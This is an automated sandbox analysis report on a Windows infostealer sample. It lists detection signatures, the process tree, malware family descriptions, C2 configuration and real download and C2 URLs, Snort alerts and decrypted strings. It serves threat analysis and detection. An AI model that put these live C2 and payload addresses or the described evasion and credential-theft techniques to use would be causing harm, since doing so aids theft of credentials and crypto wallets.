Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
VucRf0jboS.exe

Overview

General Information

Sample name:VucRf0jboS.exe
renamed because original name is a hash value
Original sample name:5cd97a765e0c9463f57769117db519fa.exe
Analysis ID:1432419
MD5:5cd97a765e0c9463f57769117db519fa
SHA1:10cbbb15ce42e4328441109668ebda4d4b7c15eb
SHA256:3b37fec0af4f32196086cfaad850c32113b60766190d283e2bc2f92a19b8cf20
Tags:32exe
Infos:

Detection

Mars Stealer, PureLog Stealer, RedLine, SectopRAT, Stealc, Vidar, zgRAT
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Antivirus detection for dropped file
Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Yara detected Mars stealer
Yara detected PureLog Stealer
Yara detected RedLine Stealer
Yara detected SectopRAT
Yara detected Stealc
Yara detected UAC Bypass using CMSTP
Yara detected Vidar stealer
Yara detected zgRAT
C2 URLs / IPs found in malware configuration
Checks if the current machine is a virtual machine (disk enumeration)
Connects to many ports of the same IP (likely port scanning)
Found direct / indirect Syscall (likely to bypass EDR)
Found evasive API chain (may stop execution after checking locale)
Found hidden mapped module (file has been removed from disk)
Found many strings related to Crypto-Wallets (likely being stolen)
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sample uses string decryption to hide its real strings
Searches for specific processes (likely to inject)
Tries to harvest and steal Bitcoin Wallet information
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Yara detected Generic Downloader
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to record screenshots
Contains functionality to retrieve information about pressed keystrokes
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates or modifies windows services
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found decision node followed by non-executed suspicious APIs
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries information about the installed CPU (vendor, model number etc)
Queries keyboard layouts
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the installation date of Windows
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • VucRf0jboS.exe (PID: 7436 cmdline: "C:\Users\user\Desktop\VucRf0jboS.exe" MD5: 5CD97A765E0C9463F57769117DB519FA)
    • u5qk.0.exe (PID: 7516 cmdline: "C:\Users\user\AppData\Local\Temp\u5qk.0.exe" MD5: 17342752EC286810D28AA4F324C3E8E5)
      • cmd.exe (PID: 7972 cmdline: "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\AppData\Local\Temp\FBAKEHIEBK.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 7792 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • FBAKEHIEBK.exe (PID: 6232 cmdline: "C:\Users\user\AppData\Local\Temp\FBAKEHIEBK.exe" MD5: 6C93FC68E2F01C20FB81AF24470B790C)
      • WerFault.exe (PID: 6856 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7516 -s 2108 MD5: C31336C1EFC2CCB44B4326EA793040F2)
    • run.exe (PID: 7780 cmdline: "C:\Users\user\AppData\Local\Temp\u5qk.2\run.exe" MD5: 9FB4770CED09AAE3B437C1C6EB6D7334)
      • cmd.exe (PID: 7924 cmdline: C:\Windows\SysWOW64\cmd.exe MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 7932 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • MSBuild.exe (PID: 7596 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe MD5: 8FDF47E0FF70C40ED3A17014AEEA4232)
    • u5qk.3.exe (PID: 3704 cmdline: "C:\Users\user\AppData\Local\Temp\u5qk.3.exe" MD5: 397926927BCA55BE4A77839B1C44DE6E)
      • SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe (PID: 7768 cmdline: "C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe" /eieci=11A12794-499E-4FA0-A281-A9A9AA8B2685 /eipi=5488CB36-BE62-4606-B07B-2EE938868BD1 MD5: 8E9C467EAC35B35DA1F586014F29C330)
    • WerFault.exe (PID: 7360 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7436 -s 1168 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • run.exe (PID: 7612 cmdline: "C:\Users\user\AppData\Local\Temp\u5qk.2\run.exe" MD5: 9FB4770CED09AAE3B437C1C6EB6D7334)
    • cmd.exe (PID: 3052 cmdline: C:\Windows\SysWOW64\cmd.exe MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 2996 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • MSBuild.exe (PID: 5440 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe MD5: 8FDF47E0FF70C40ED3A17014AEEA4232)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
RedLine StealerRedLine Stealer is a malware available on underground forums for sale apparently as standalone ($100/$150 depending on the version) or also on a subscription basis ($100/month). This malware harvests information from browsers such as saved credentials, autocomplete data, and credit card information. A system inventory is also taken when running on a target machine, to include details such as the username, location data, hardware configuration, and information regarding installed security software. More recent versions of RedLine added the ability to steal cryptocurrency. FTP and IM clients are also apparently targeted by this family, and this malware has the ability to upload and download files, execute commands, and periodically send back information about the infected computer.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.redline_stealer
NameDescriptionAttributionBlogpost URLsLink
StealcStealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.stealc
NameDescriptionAttributionBlogpost URLsLink
VidarVidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.vidar
NameDescriptionAttributionBlogpost URLsLink
zgRATzgRAT is a Remote Access Trojan malware which sometimes drops other malware such as AgentTesla malware. zgRAT has an inforstealer use which targets browser information and cryptowallets.Usually spreads by USB or phishing emails with -zip/-lnk/.bat/.xlsx attachments and so on.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.zgrat
{"C2 url": "185.172.128.76/3cd2b41cbde8fc9c.php"}
{"C2 url": "http://185.172.128.76/3cd2b41cbde8fc9c.php"}
SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_Stealc_1Yara detected StealcJoe Security
    SourceRuleDescriptionAuthorStrings
    C:\Users\user\AppData\Local\Temp\nkhoJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      C:\Users\user\AppData\Local\Temp\nkhoJoeSecurity_RedLineYara detected RedLine StealerJoe Security
        C:\Users\user\AppData\Local\Temp\nkhoMALWARE_Win_Arechclient2Detects Arechclient2 RATditekSHen
        • 0xb864a:$s14: keybd_event
        • 0xbf3b9:$v1_1: grabber@
        • 0xb921c:$v1_2: <BrowserProfile>k__
        • 0xb9c95:$v1_3: <SystemHardwares>k__
        • 0xb9d54:$v1_5: <ScannedWallets>k__
        • 0xb9de4:$v1_6: <DicrFiles>k__
        • 0xb9dc0:$v1_7: <MessageClientFiles>k__
        • 0xba18a:$v1_8: <ScanBrowsers>k__BackingField
        • 0xba1dc:$v1_8: <ScanWallets>k__BackingField
        • 0xba1f9:$v1_8: <ScanScreen>k__BackingField
        • 0xba233:$v1_8: <ScanVPN>k__BackingField
        • 0xaba62:$v1_9: displayName[AString-ZaString-z\d]{2String4}\.[String\w-]{String6}\.[\wString-]{2String7}Local Extension Settingshost
        • 0xab36e:$v1_10: \sitemanager.xml MB or SELECT * FROM Cookiesconfig
        C:\Users\user\AppData\Local\Temp\ssfwvkJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          C:\Users\user\AppData\Local\Temp\ssfwvkJoeSecurity_RedLineYara detected RedLine StealerJoe Security
            Click to see the 2 entries
            SourceRuleDescriptionAuthorStrings
            00000009.00000000.2186967041.0000000000401000.00000020.00000001.01000000.0000000E.sdmpJoeSecurity_DelphiSystemParamCountDetected Delphi use of System.ParamCount()Joe Security
              00000012.00000002.2523771095.0000000000902000.00000002.00000001.01000000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                00000012.00000002.2523771095.0000000000902000.00000002.00000001.01000000.00000000.sdmpJoeSecurity_RedLineYara detected RedLine StealerJoe Security
                  00000000.00000002.2367868984.0000000004140000.00000040.00001000.00020000.00000000.sdmpWindows_Trojan_Smokeloader_3687686funknownunknown
                  • 0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
                  00000000.00000003.2187851077.00000000071E7000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_DelphiSystemParamCountDetected Delphi use of System.ParamCount()Joe Security
                    Click to see the 39 entries
                    SourceRuleDescriptionAuthorStrings
                    1.2.u5qk.0.exe.400000.0.unpackJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
                      1.2.u5qk.0.exe.400000.0.unpackJoeSecurity_MarsStealerYara detected Mars stealerJoe Security
                        1.2.u5qk.0.exe.5c70e67.1.raw.unpackJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
                          1.2.u5qk.0.exe.5c70e67.1.raw.unpackJoeSecurity_MarsStealerYara detected Mars stealerJoe Security
                            18.2.MSBuild.exe.900000.0.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                              Click to see the 81 entries
                              No Sigma rule has matched
                              Timestamp:04/27/24-01:31:08.487333
                              SID:2856233
                              Source Port:49730
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:04/27/24-01:31:16.462312
                              SID:2051831
                              Source Port:80
                              Destination Port:49733
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:04/27/24-01:31:14.075716
                              SID:2044243
                              Source Port:49733
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:04/27/24-01:31:15.895415
                              SID:2044244
                              Source Port:49733
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:04/27/24-01:31:16.178347
                              SID:2051828
                              Source Port:80
                              Destination Port:49733
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:04/27/24-01:31:16.180488
                              SID:2044246
                              Source Port:49733
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected

                              Click to jump to signature section

                              Show All Signature Results

                              AV Detection

                              barindex
                              Source: http://185.172.128.59/syncUpd.exeAvira URL Cloud: Label: malware
                              Source: http://185.172.128.228/ping.php?substr=twoAvira URL Cloud: Label: malware
                              Source: http://185.172.128.203/tiktok.exeAvira URL Cloud: Label: malware
                              Source: C:\Users\user\AppData\Local\Temp\nkhoAvira: detection malicious, Label: HEUR/AGEN.1307453
                              Source: C:\Users\user\AppData\Local\Temp\ssfwvkAvira: detection malicious, Label: HEUR/AGEN.1307453
                              Source: 00000001.00000003.1758935505.0000000005CA0000.00000004.00001000.00020000.00000000.sdmpMalware Configuration Extractor: Vidar {"C2 url": "http://185.172.128.76/3cd2b41cbde8fc9c.php"}
                              Source: u5qk.0.exe.7516.1.memstrminMalware Configuration Extractor: StealC {"C2 url": "185.172.128.76/3cd2b41cbde8fc9c.php"}
                              Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\tiktok[1].exeReversingLabs: Detection: 47%
                              Source: C:\Users\user\AppData\Local\Temp\FBAKEHIEBK.exeReversingLabs: Detection: 47%
                              Source: C:\Users\user\AppData\Local\Temp\nkhoReversingLabs: Detection: 64%
                              Source: C:\Users\user\AppData\Local\Temp\ssfwvkReversingLabs: Detection: 64%
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.2\UIxMarketPlugin.dllReversingLabs: Detection: 18%
                              Source: C:\Users\user\AppData\Roaming\SecureClient\UIxMarketPlugin.dllReversingLabs: Detection: 18%
                              Source: VucRf0jboS.exeReversingLabs: Detection: 44%
                              Source: C:\Users\user\AppData\Local\Temp\nkhoJoe Sandbox ML: detected
                              Source: C:\Users\user\AppData\Local\Temp\ssfwvkJoe Sandbox ML: detected
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exeJoe Sandbox ML: detected
                              Source: VucRf0jboS.exeJoe Sandbox ML: detected
                              Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpackString decryptor: INSERT_KEY_HERE
                              Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpackString decryptor: GetProcAddress
                              Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpackString decryptor: LoadLibraryA
                              Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpackString decryptor: lstrcatA
                              Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpackString decryptor: OpenEventA
                              Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpackString decryptor: CreateEventA
                              Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpackString decryptor: CloseHandle
                              Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpackString decryptor: Sleep
                              Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpackString decryptor: GetUserDefaultLangID
                              Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpackString decryptor: VirtualAllocExNuma
                              Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpackString decryptor: VirtualFree
                              Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpackString decryptor: GetSystemInfo
                              Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpackString decryptor: VirtualAlloc
                              Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpackString decryptor: HeapAlloc
                              Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpackString decryptor: GetComputerNameA
                              Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpackString decryptor: lstrcpyA
                              Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpackString decryptor: GetProcessHeap
                              Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpackString decryptor: GetCurrentProcess
                              Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpackString decryptor: lstrlenA
                              Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpackString decryptor: ExitProcess
                              Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpackString decryptor: GlobalMemoryStatusEx
                              Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpackString decryptor: GetSystemTime
                              Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpackString decryptor: SystemTimeToFileTime
                              Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpackString decryptor: advapi32.dll
                              Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpackString decryptor: gdi32.dll
                              Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpackString decryptor: user32.dll
                              Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpackString decryptor: crypt32.dll
                              Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpackString decryptor: ntdll.dll
                              Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpackString decryptor: GetUserNameA
                              Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpackString decryptor: CreateDCA
                              Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpackString decryptor: GetDeviceCaps
                              Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpackString decryptor: ReleaseDC
                              Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpackString decryptor: CryptStringToBinaryA
                              Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpackString decryptor: sscanf
                              Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpackString decryptor: VMwareVMware
                              Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpackString decryptor: HAL9TH
                              Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpackString decryptor: JohnDoe
                              Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpackString decryptor: DISPLAY
                              Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpackString decryptor: %hu/%hu/%hu
                              Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpackString decryptor: http://185.172.128.76
                              Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpackString decryptor: /3cd2b41cbde8fc9c.php
                              Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpackString decryptor: /15f649199f40275b/
                              Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpackString decryptor: default10
                              Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpackString decryptor: GetEnvironmentVariableA
                              Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpackString decryptor: GetFileAttributesA
                              Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpackString decryptor: GlobalLock
                              Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpackString decryptor: HeapFree
                              Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpackString decryptor: GetFileSize
                              Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpackString decryptor: GlobalSize
                              Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpackString decryptor: CreateToolhelp32Snapshot
                              Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpackString decryptor: IsWow64Process
                              Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpackString decryptor: Process32Next
                              Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpackString decryptor: GetLocalTime
                              Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpackString decryptor: FreeLibrary
                              Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpackString decryptor: GetTimeZoneInformation
                              Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpackString decryptor: GetSystemPowerStatus
                              Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpackString decryptor: GetVolumeInformationA
                              Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpackString decryptor: GetWindowsDirectoryA
                              Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpackString decryptor: Process32First
                              Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpackString decryptor: GetLocaleInfoA
                              Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpackString decryptor: GetUserDefaultLocaleName
                              Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpackString decryptor: GetModuleFileNameA
                              Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpackString decryptor: DeleteFileA
                              Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpackString decryptor: FindNextFileA
                              Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpackString decryptor: LocalFree
                              Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpackString decryptor: FindClose
                              Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpackString decryptor: SetEnvironmentVariableA
                              Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpackString decryptor: LocalAlloc
                              Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpackString decryptor: GetFileSizeEx
                              Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpackString decryptor: ReadFile
                              Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpackString decryptor: SetFilePointer
                              Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpackString decryptor: WriteFile
                              Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpackString decryptor: CreateFileA
                              Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpackString decryptor: FindFirstFileA
                              Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpackString decryptor: CopyFileA
                              Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpackString decryptor: VirtualProtect
                              Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpackString decryptor: GetLogicalProcessorInformationEx
                              Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpackString decryptor: GetLastError
                              Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpackString decryptor: lstrcpynA
                              Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpackString decryptor: MultiByteToWideChar
                              Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpackString decryptor: GlobalFree
                              Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpackString decryptor: WideCharToMultiByte
                              Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpackString decryptor: GlobalAlloc
                              Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpackString decryptor: OpenProcess
                              Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpackString decryptor: TerminateProcess
                              Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpackString decryptor: GetCurrentProcessId
                              Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpackString decryptor: gdiplus.dll
                              Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpackString decryptor: ole32.dll
                              Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpackString decryptor: bcrypt.dll
                              Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpackString decryptor: wininet.dll
                              Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpackString decryptor: shlwapi.dll
                              Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpackString decryptor: shell32.dll
                              Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpackString decryptor: psapi.dll
                              Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpackString decryptor: rstrtmgr.dll
                              Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpackString decryptor: CreateCompatibleBitmap
                              Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpackString decryptor: SelectObject
                              Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpackString decryptor: BitBlt
                              Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpackString decryptor: DeleteObject
                              Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpackString decryptor: CreateCompatibleDC
                              Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpackString decryptor: GdipGetImageEncodersSize
                              Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpackString decryptor: GdipGetImageEncoders
                              Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpackString decryptor: GdipCreateBitmapFromHBITMAP
                              Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpackString decryptor: GdiplusStartup
                              Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpackString decryptor: GdiplusShutdown
                              Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpackString decryptor: GdipSaveImageToStream
                              Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpackString decryptor: GdipDisposeImage
                              Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpackString decryptor: GdipFree
                              Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpackString decryptor: GetHGlobalFromStream
                              Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpackString decryptor: CreateStreamOnHGlobal
                              Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpackString decryptor: CoUninitialize
                              Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpackString decryptor: CoInitialize
                              Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpackString decryptor: CoCreateInstance
                              Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpackString decryptor: BCryptGenerateSymmetricKey
                              Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpackString decryptor: BCryptCloseAlgorithmProvider
                              Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpackString decryptor: BCryptDecrypt
                              Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpackString decryptor: BCryptSetProperty
                              Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpackString decryptor: BCryptDestroyKey
                              Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpackString decryptor: BCryptOpenAlgorithmProvider
                              Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpackString decryptor: GetWindowRect
                              Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpackString decryptor: GetDesktopWindow
                              Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpackString decryptor: GetDC
                              Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpackString decryptor: CloseWindow
                              Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpackString decryptor: wsprintfA
                              Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpackString decryptor: EnumDisplayDevicesA
                              Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpackString decryptor: GetKeyboardLayoutList
                              Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpackString decryptor: CharToOemW
                              Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpackString decryptor: wsprintfW
                              Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpackString decryptor: RegQueryValueExA
                              Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpackString decryptor: RegEnumKeyExA
                              Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpackString decryptor: RegOpenKeyExA
                              Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpackString decryptor: RegCloseKey
                              Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpackString decryptor: RegEnumValueA
                              Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpackString decryptor: CryptBinaryToStringA
                              Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpackString decryptor: CryptUnprotectData
                              Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpackString decryptor: SHGetFolderPathA
                              Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpackString decryptor: ShellExecuteExA
                              Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpackString decryptor: InternetOpenUrlA
                              Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpackString decryptor: InternetConnectA
                              Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpackString decryptor: InternetCloseHandle
                              Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpackString decryptor: InternetOpenA
                              Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpackString decryptor: HttpSendRequestA
                              Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpackString decryptor: HttpOpenRequestA
                              Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpackString decryptor: InternetReadFile
                              Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpackString decryptor: InternetCrackUrlA
                              Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpackString decryptor: StrCmpCA
                              Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpackString decryptor: StrStrA
                              Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpackString decryptor: StrCmpCW
                              Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpackString decryptor: PathMatchSpecA
